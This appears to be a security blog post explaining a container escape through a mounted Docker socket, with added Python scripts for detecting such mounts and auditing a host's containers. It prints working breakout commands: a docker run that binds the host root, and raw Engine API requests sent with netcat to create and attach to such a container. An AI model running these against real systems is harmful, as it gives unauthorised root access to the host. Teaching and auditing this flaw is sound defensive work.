Docker breakout: Mounted docker socket

Kindawingingit
Published in CYSCOM VITCC
Nov 22, 2021, 4 min read

Docker containers are in use pretty much everywhere now, so it is essential to make sure they are secure. I have been playing around with Docker breakouts for a couple of weeks and wanted to document them. This post deals with a Docker socket mounted into a container.

So what is the Docker socket? It is a UNIX domain socket on which the Docker daemon listens; the Docker CLI, and any other client, sends its API requests to the daemon over it. It usually resides at /var/run/docker.sock. In simple terms, every API request to create, start, or run a container goes through this socket. So why would it be mounted into a container? It is one of the ways to use the Docker client from inside a container. When this socket is mounted into a container, whoever controls the container can create containers and run them on the host system; the daemon runs as root on the host and the socket carries no authentication of its own. (Check out this blog about creating containers inside a container.)

Exploitation

We abuse the Docker socket to create and run a container that has the host's file system bind-mounted into it. Because the socket mounted into our container belongs to the Docker daemon on the host, every API request we send goes to that daemon, outside the container. In essence, when we reference file system mounts in a request, the daemon mounts the host's file system, not the file system of the container we are running the commands from.

Explaining the methodology of the breakout.

Let's create ourselves a container with a mounted docker socket to work with.

Created a container using an ubuntu image and mounted the docker socket.

Here I mounted the Docker socket at /var/run/docker.sock, but it could be mounted at any path. It is worth checking where the socket is located first, since we need its path for everything that follows.
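The "check where the socket is located" step is also a useful self-check from the defender's side, for instance in a CI runner image that should never have the daemon socket in it. The Python example below is added here and is not part of the original post. It parses /proc/self/mountinfo, where every bind mount, including a single socket file, gets its own line, keeps the entries whose mount point or host-side path ends in .sock, and then confirms that each candidate really is a UNIX socket. The sample mountinfo lines used to exercise it are constructed.

```python
"""Find daemon sockets bind-mounted into this container, whatever path they
were given. Added example, not from the original post."""
import os
import re
import stat


def _unescape(path):
    """Undo the \\ooo octal escapes mountinfo uses for space, tab, newline and backslash."""
    return re.sub(r"\\([0-7]{3})", lambda m: chr(int(m.group(1), 8)), path)


def socket_mount_points(mountinfo_text):
    """Return (mount_point, host_side_root) pairs from mountinfo text that look
    like a mounted socket file.

    mountinfo fields (man 5 proc): mount-id parent-id major:minor root
    mount-point options [optional fields] - fstype source super-options.
    For a bind-mounted socket the root (4th field) is the socket's path inside
    the host file system it came from (e.g. /docker.sock on the host's /run
    tmpfs) and the mount point (5th field) is where it appears in the
    container. Either one may give the socket away, because the container-side
    name is chosen by whoever ran docker run -v.
    """
    found = []
    for line in mountinfo_text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue
        root, mount_point = _unescape(fields[3]), _unescape(fields[4])
        if mount_point.endswith(".sock") or root.endswith(".sock"):
            found.append((mount_point, root))
    return found


def live_socket_mounts(mountinfo_path="/proc/self/mountinfo"):
    """Scan this process's mount table and keep only candidates that really are
    UNIX sockets on disk (a file merely named docker.sock proves nothing)."""
    with open(mountinfo_path) as fh:
        candidates = socket_mount_points(fh.read())
    live = []
    for mount_point, root in candidates:
        try:
            if stat.S_ISSOCK(os.stat(mount_point).st_mode):
                live.append((mount_point, root))
        except OSError:
            continue  # mount point vanished or is unreadable; treat as absent
    return live


if __name__ == "__main__":
    hits = live_socket_mounts()
    if not hits:
        print("no socket files are bind-mounted into this container")
    for mount_point, root in hits:
        print(f"socket mounted at {mount_point} (host-side path {root})")
```

Run it inside the container with python3; an empty result from a clean image and a hit from the image built above is the expected contrast, and the host-side root path tells you which host socket was bound in even when the container-side name was changed.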

Method 1: Using Docker

Check whether the Docker CLI is installed in the container; if it is, we can run containers directly with it.

We can list all the containers running on the host, including the one we are trapped in.

If we can use docker, it's a piece of cake to create a container with a volume mount of the host file system.

Breakout using docker.

As we can see, we get the whole host file system with the command
docker run -v /:/host -it ubuntu
This spawns a container with the host's file system located at /host.

Method 2: Using Netcat

We can also make API requests over the UNIX socket by hand if the Docker CLI isn't installed in the container. Check out the Docker Engine API docs to see all the requests you can make. First, we need to connect to the Docker socket; for this we need netcat-openbsd, a netcat build that supports UNIX domain sockets with -U. The command is
nc -U /var/run/docker.sock
This opens a connection to the Docker socket, and we can type our API requests from here. For instance, to list all the running containers, we make a GET request to /containers/json. The request is (end the headers with an empty line, i.e. press Enter twice, to send it)

GET /containers/json HTTP/1.1
Host:

Making API requests using netcat

Using API requests, all we need to do is replicate the docker run command we used in the first method. We need to make separate requests to create, start and attach to the container. To create a container, the request is (the headers end with an empty line and the JSON body follows; the daemon answers with the new container's Id, which the next two requests need)

POST /containers/create HTTP/1.1
Host:
Content-Type: application/json
Content-Length: 265

{"Hostname": "","Domainname": "","User": "","AttachStdin": true,"AttachStdout": true,"AttachStderr": true,"Tty": true,"OpenStdin": true,"StdinOnce": true,"Entrypoint": "/bin/bash","Image": "ubuntu","Volumes": {"/hostfs/": {}},"HostConfig": {"Binds": ["/:/hostfs"]}}

Creating a container by making API requests

To start the container, the request is (replace <id> with the Id returned by the create request)

POST /containers/<id>/start HTTP/1.1
Host:

Starting a container

To attach to the container, the request is

POST /containers/<id>/attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
Host:
Upgrade: tcp
Connection: Upgrade

Attaching to the container

As you can see, we get a shell in the new container, and that container has the host's file system mounted at /hostfs.
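The netcat method works because the daemon's API is plain HTTP over the UNIX socket, with no authentication of its own. The following Python example is added here and is not from the original post: it uses that same API from the host operator's side to find containers that already have a Docker socket or the host root bind-mounted, or that run privileged, which is the audit a host owner would run before somebody else finds those containers. It talks to the daemon through http.client over an AF_UNIX socket, lists every container with GET /containers/json?all=1 and inspects each one with GET /containers/<id>/json. The socket path defaults to /var/run/docker.sock; the container data comes from whatever daemon it is pointed at.

```python
"""Audit a Docker host for containers that can already reach the daemon or the
host file system. Added example, not from the original post: the same
unauthenticated HTTP-over-UNIX-socket API as the netcat method above, used
from the host operator's side."""
import http.client
import json
import socket
import sys


class UnixHTTPConnection(http.client.HTTPConnection):
    """http.client connection that dials a UNIX domain socket instead of TCP.
    The 'localhost' host name only ends up in the Host: header."""

    def __init__(self, socket_path):
        super().__init__("localhost")
        self.socket_path = socket_path

    def connect(self):
        self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        self.sock.connect(self.socket_path)


def api_get(socket_path, path):
    """GET <path> (e.g. /containers/json) from the daemon and decode the JSON reply."""
    conn = UnixHTTPConnection(socket_path)
    try:
        conn.request("GET", path)
        resp = conn.getresponse()
        body = resp.read()
        if resp.status != 200:
            raise RuntimeError(f"{path}: HTTP {resp.status} {body[:200]!r}")
        return json.loads(body)
    finally:
        conn.close()


def risky_mounts(inspect_doc):
    """Findings for one container inspect document (GET /containers/<id>/json).

    Flags a bind mount of a docker.sock (full control of the daemon), a bind
    mount of the host root / (full read/write of the host file system, the
    -v /:/host case from Method 1), and HostConfig.Privileged.
    """
    findings = []
    if inspect_doc.get("HostConfig", {}).get("Privileged"):
        findings.append("privileged container")
    for mount in inspect_doc.get("Mounts", []):
        if mount.get("Type") != "bind":
            continue
        src, dst = mount.get("Source", ""), mount.get("Destination", "")
        if src.rstrip("/").endswith("docker.sock"):
            findings.append(f"docker socket bind {src} -> {dst}")
        elif src == "/":
            findings.append(f"host root bind / -> {dst}")
    return findings


def audit(socket_path="/var/run/docker.sock"):
    """Inspect every container, running or stopped, and return {short_id: findings}
    for the ones with at least one finding."""
    report = {}
    for summary in api_get(socket_path, "/containers/json?all=1"):
        cid = summary["Id"]
        findings = risky_mounts(api_get(socket_path, f"/containers/{cid}/json"))
        if findings:
            report[cid[:12]] = findings
    return report


if __name__ == "__main__":
    sock = sys.argv[1] if len(sys.argv) > 1 else "/var/run/docker.sock"
    report = audit(sock)
    if not report:
        print("no container has the daemon socket or host root mounted")
    for cid, findings in report.items():
        print(cid, "; ".join(findings))
```

Run it on the host as a user that can reach the socket (python3 audit.py, or pass a different socket path as the first argument). The 12-character ids match the ones docker ps prints, and stopped containers are included because a stopped container with the socket bound in becomes a live problem the moment someone starts it.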

Conclusion -

Even though this vulnerability is trivial, it helped me to understand Docker at a better level, and how the Docker API works. I hope to blog about the rest of the Docker breakouts as well. Connect with me on LinkedIn.

